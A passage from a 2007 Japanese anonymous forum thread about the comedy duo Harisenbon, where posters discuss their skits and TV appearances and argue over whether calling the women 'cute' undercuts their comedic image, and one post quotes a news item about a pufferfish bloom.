10カラットっていう番組でコントやってたけど、ハリセンが出てくるコントはほんとに面白かったよ。
特にはるかがオリラジあっちゃんとやってたレンとナナは素晴らしかった。
ゲンセキで初めて見た時はいくらなんでもこの見た目はないだろと思ったし、
選抜された時もどーせ見た目で選ばれたんだろと思ってたけど、
10カラ見てるうちに、ハリセンボンってものすごく才能あるじゃん!と思うようになった。
番組終了前ぐらいになると、完全にはまってしまって、ハリセンボンが出てきただけで笑っちゃうぐらいに。
女芸人という枠じゃなくて、あの超若手世代の芸人の中じゃポテンシャルが群をぬいてる。

>>400
そうそう、はるなは分かりやすくて、はるかは知れば知るほど面白い。
よくもこんな才能ある二人がくんだもんだと思う。NSCに感謝。

409 :名無しさん:2007/02/22(木) 14:02:32
>>406
???
前スレから他にもハリセン良かったって声いっぱいあったけど?
ハリセン見直したとか、キャラだけかと思ってたけどって書いてあったし
別にファンが出張してるだけじゃないだろ。アンチもいたし。


410 :名無しさん:2007/02/22(木) 23:37:51
【記事】   島根半島沿岸でハリセンボン大発生

松江市の島根半島沿岸で、体中に針を持つ海水魚のハリセンボンが大量に定置網にかかり、
捕獲された魚を傷つけ、漁師を困らせている。

 同市島根町野井の漁業会社では、漁港から約二キロ沖に設置した定置網に、一月中旬ごろ
からハリセンボンがかかり始めた。一回の漁で捕れるのは、多い時で四トンタンクに一杯半と、
スルメイカなど旬の漁獲の約三倍。引き上げると体を膨らませてとげをたてるため、イカやブリ
などを傷つける被害が相次いでいる。

 同社の金村幸雄漁労長(60)は「十二月に越前クラゲが終わり、ほっとしたのもつかの間だった」
と渋い顔。JFしまね野井出張所などによると、ハリセンボンは毎年定置網にかかるが、大量発生は
二〇〇一年以来。

 同じ定置網漁業を行う同市美保関町の漁港でも同様の被害が出ている。原因は不明という。


山陰中央新報('07/02/20 写真あり)
http://www.sanin-chuo.co.jp/news/modules/news/article.php?storyid=345709006



411 :ユメ見る男色家 ◆69OToKo1TI :2007/02/23(金) 00:22:45
ハリセン好きだわ
ブレイク寸前って感じで最近、露出が増えてきてるけど、
あともう少しでブレイクって感じね。
はるかは、この前堂本兄弟で無言色っぽいを歌ったけど
歌声が良かったわ。ちゃんとボイトレしたらCD出せるわよ。

412 :はるな:2007/02/23(金) 02:51:48
>>410そのハリセンボンじゃねぇぇよっ!

413 :キレカワママ:2007/02/23(金) 03:42:19
滅多に会わない友達に似すぎてる… 年齢一緒だし全てそっくり… てか歌 普通の歌だね。もっと良い歌だったら売れたかも?

414 :名無しさん:2007/02/23(金) 03:42:45
かわいいとか歌声がいいとかどうでもいい
芸人なんだから笑いの評価をして欲しい 
と本人達も思ってそうだが…どうなんだろう

415 :名無しさん:2007/02/23(金) 03:48:12
芸人になりたいです(´・ω・`)painomiumeee@xxne.jp

416 :名無しさん:2007/02/23(金) 03:55:17
はるなとはるかでボンボンー

417 :名無しさん:2007/02/23(金) 04:52:37
好き。

418 :名無しさん:2007/02/23(金) 10:59:10
>>414
そうだよね
ブスキャラで売ってるのにかわいいと言われるのは逆にマイナスだと思う

419 :名無しさん:2007/02/23(金) 11:09:44
かわいくはない

420 :名無しさん:2007/02/23(金) 11:15:29
春菜ちゃん誕生日オメデトウ!!!

421 :名無しさん:2007/02/23(金) 11:19:09
二人の持つふいんき(ryが可愛らしいのであって、
顔がどうのってわけじゃない。

422 :名無しさん:2007/02/23(金) 11:32:42
>>421
そんなのみんなわかってると思うよ?

423 :名無しさん:2007/02/23(金) 12:53:36
ふいんき美人はおばあちゃんになっても得するよ
昔は美人だったろうけどギスギスしたババアよりは百倍マシ

424 :名無しさん:2007/02/23(金) 13:09:09
「ふいんき」じゃなく「ふんいき」ね

425 :名無しさん:2007/02/23(金) 13:59:12
ハリセンボンは面白いと思うが
ふいんき美人だの、かわいいだのありえない
はるかがクラスにいたらいじめられてただろうし
はるなはオモシロキャラでも影でデブとバカにされてたはずだ
2人とも芸人になれる才能があればこそ輝く人であって
一般人ならただのデブと死神
せっかく自ら売りにしてるのを否定して「かわいい」なんて寒いレスすんなよ
「デブとブサでキモイけど面白い」とレスしてやれよ


426 :名無しさん:2007/02/23(金) 14:08:17
>>425
禿同
かわいいかわいい騒ぐからハリセンヲタは痛いって言われるんだよ

ブスと言われたほうが芸人としてはオイシイ
アイドルじゃないんだからさ

427 :名無しさん:2007/02/23(金) 14:40:05
リンカーンはキャイーン天野をはずして近藤春菜を入れてくれ、あの授業面白かった

428 :名無しさん:2007/02/23(金) 14:44:56
クラスにいたら話かけないくせに可愛いはないだろwww

429 :名無しさん:2007/02/23(金) 14:55:12
↑そうかな?友達になったら楽しいと思うよ。

430 :名無しさん:2007/02/23(金) 14:56:20
死神がスピッツのボーカルに似すぎてうける

431 :名無しさん:2007/02/23(金) 15:03:22
おかあさんといっしょのお姉さんにも似てるw

432 :名無しさん:2007/02/23(金) 15:06:10
>>429みたいなやつが合コンで自分が引き立つ為にハリセンボンみたいな奴を呼ぶわけだ

433 :名無しさん:2007/02/23(金) 15:16:56
>>429
楽しいからって可愛いはないだろ可愛いはww「可愛いと思うなら自分と入れ替われ」って言われたらどうするよ?ww
女って建前だか同情だか共感だか知らんがブサ女芸人を可愛いことにしたがるよな
ハリセンボンに限らず久本やしずちゃんにも「かわいい〜!」と声援送ったりすんのが寒過ぎることを知って欲しい
自分も女だがそういう女は激しく寒くウザく感じる

434 :名無しさん:2007/02/23(金) 15:40:17
>自分と入れ替われ
ワロタw
そういう人ってホントに可愛い芸人には可愛いって言わないんだよね〜
嫉妬ってやつなのかな

435 :名無しさん:2007/02/23(金) 16:05:08
かわいいときれいとか美人は違うから。
しずちゃんとかは行動がかわいいの。
女の子は男にもかわいいとか言うでしょ。嫉妬とは違う。本心で言ってる。

436 :名無しさん:2007/02/23(金) 16:14:55
まちゃまちゃが言ってたけど、ハリセンボンは合コンでモテるらしいね

437 :名無しさん:2007/02/23(金) 16:35:38
それは美人さんには緊張して手が出せないけど
ハリセンボンやしづちゃんみたいな人は気楽に話せるからであろう
もてるというか友達以上にはならない(できない)タイプね

438 :名無しさん:2007/02/23(金) 16:40:45
>>436
ネタでしょ?
そうじゃないにしても、まちゃまちゃよりはマシってだけじゃないの?

ハリセン好きだけど、可愛いとは思わないな

439 :名無しさん:2007/02/23(金) 16:56:54
うちのチワワが力んでウンチしてる姿は可愛いよ。
素朴なおばあちゃんも可愛かったりするし。
あいくるしいっちゅーことでしょ。
顔が可愛い、綺麗とは別で女は「可愛い」を使う。

440 :名無しさん:2007/02/23(金) 17:11:02
そんなことは百も承知
その「可愛い」を芸人に使う意味を知れ
ある意味芸人潰しだよ
でもはるなは女から「かわいい〜」言われて寒くなる空気をちゃんと
「アンタ達よりはね!」とかアドリブでちゃんと笑いに変えられるようになったからまだいい

441 :名無しさん:2007/02/23(金) 18:11:37
おやじでも童顔で小太りだと小動物っぽい可愛さがあるだろ

春菜を可愛いと言うのはそーゆうことダロ

442 :名無しさん:2007/02/23(金) 18:13:00
はるなってどっち?

443 :名無しさん:2007/02/23(金) 18:18:50
可愛い方

444 :名無しさん:2007/02/23(金) 19:38:20
>>442
太ってる方

445 :名無しさん:2007/02/23(金) 20:38:42
リンカーン。。。

まあ、俺の分析。 

随所随所で鋭い突っ込みが見られたが・・あれってトランシーバーでリンカーンのスタッフの
指示があったのはほぼ間違いないだろ・・w

男性芸人だと角が立つが、若手で女芸人持ってくるところで、怒るのも怒れなくなる。
そのことにより、スタッフ側の言い分も言える。

「リンカーンは何番目の女なの。」
「リンカーンに集中して」

TBSスタッフの叫びだろ・・wwwww、スタッフの思惑通り、ハリセンボンはよい仕事したと思うよ。
花子的ポジションゲットみたいな・・wwww

はりせんぼんの、はるなの方も、最近満たされてきて、表情がよくなってきてるね。
TVでもよくみるし、今後も伸びるんじゃないかな。


446 :名無しさん:2007/02/23(金) 20:52:43
>>445
リンカーンスレから来ました
リンカーンスタッフがそんなに優秀なら嬉しい限りなんだが…
浜田がガリにツッコんだ時の返し部分はガリのアドリブだろ
あのスタッフにあんな返しすぐ出せるとは思えない
おおまかな台本はあるだろうがトランシーバーってwwww
リンカーンで見てから色々動画見たがガリの方はオオギリとか才能の片鱗を感じたし
いい線いってるが「何番目の女なの」は松本が昔ピンで番組増やし始めたころ
ガキ使で浜田に言ってたセリフだよ「ピロートークもなしに〜」もな

447 :名無しさん:2007/02/23(金) 21:22:59
>>446
偉そうにガキ使でと言ったがヘイヘイだったかもしらん…

448 :名無しさん:2007/02/23(金) 21:28:53
>>424

73 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)